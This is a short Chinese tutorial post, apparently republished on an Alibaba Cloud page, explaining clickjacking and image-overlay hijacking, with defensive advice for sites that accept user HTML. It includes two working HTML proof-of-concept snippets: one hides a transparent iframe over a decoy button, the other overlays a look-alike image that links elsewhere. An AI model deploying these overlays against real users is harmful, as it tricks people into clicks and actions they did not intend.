點擊劫持和圖片覆蓋劫持

來源:互聯網
上載者:User

點擊劫持是一種視覺上的欺騙手段。攻擊者使用一個透明的、不可見的iframe,覆蓋在一
個網頁上,然後誘使使用者在該網頁上進行操作,此時使用者將在不知情的情況下點擊透明的iframe

頁面上的某個按鈕或者連結。通過調整iframe 頁面的位置,可以誘使使用者恰好點擊在iframe 頁面的一些功能性按鈕上。

<head><title>CLICK JACK!!!</title><style>iframe {width: 900px;height: 250px;/* Use absolute positioning to line up update button with fake button */position: absolute;top: -195px;left: -740px;z-index: 2;/* Hide from view */-moz-opacity: 0;opacity: 0;filter: alpha(opacity=0);}button {position: absolute;top: 10px;left: 10px;z-index: 1;width: 120px;}</style></head><body><iframe src="http://www.sohu.com" scrolling="no"></iframe><button>將會被劫持</button></body></html>
與之類似的還有圖片覆蓋劫持,將被劫持的頁面上的圖片用一個一模一樣的圖片覆蓋,但是連結地址不一樣。

如下面的例子

<head><title>cross site image overlaying!!!</title></head><body><div id="image1"><a href="http://blog.csdn.net/kkdelta/article/details/8924724"><img src=http://www.bkjia.com/uploads/allimg/131106/03102K605-0.jpg></a></div><a href="http://blog.csdn.net/kkdelta"><img src=http://www.bkjia.com/uploads/allimg/131106/03102K605-0.jpgstyle=position:absolute;left:10px;top:10px;width:50px;height:50px;/></a></body></html>

所以我們在給使用者提供輸入HTML程式碼片段的時候,需要考慮這種漏洞。試了一下CSDN的代碼編輯模式下是不是存在這種漏洞,發現對這兩種都進行了屏蔽處理。

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.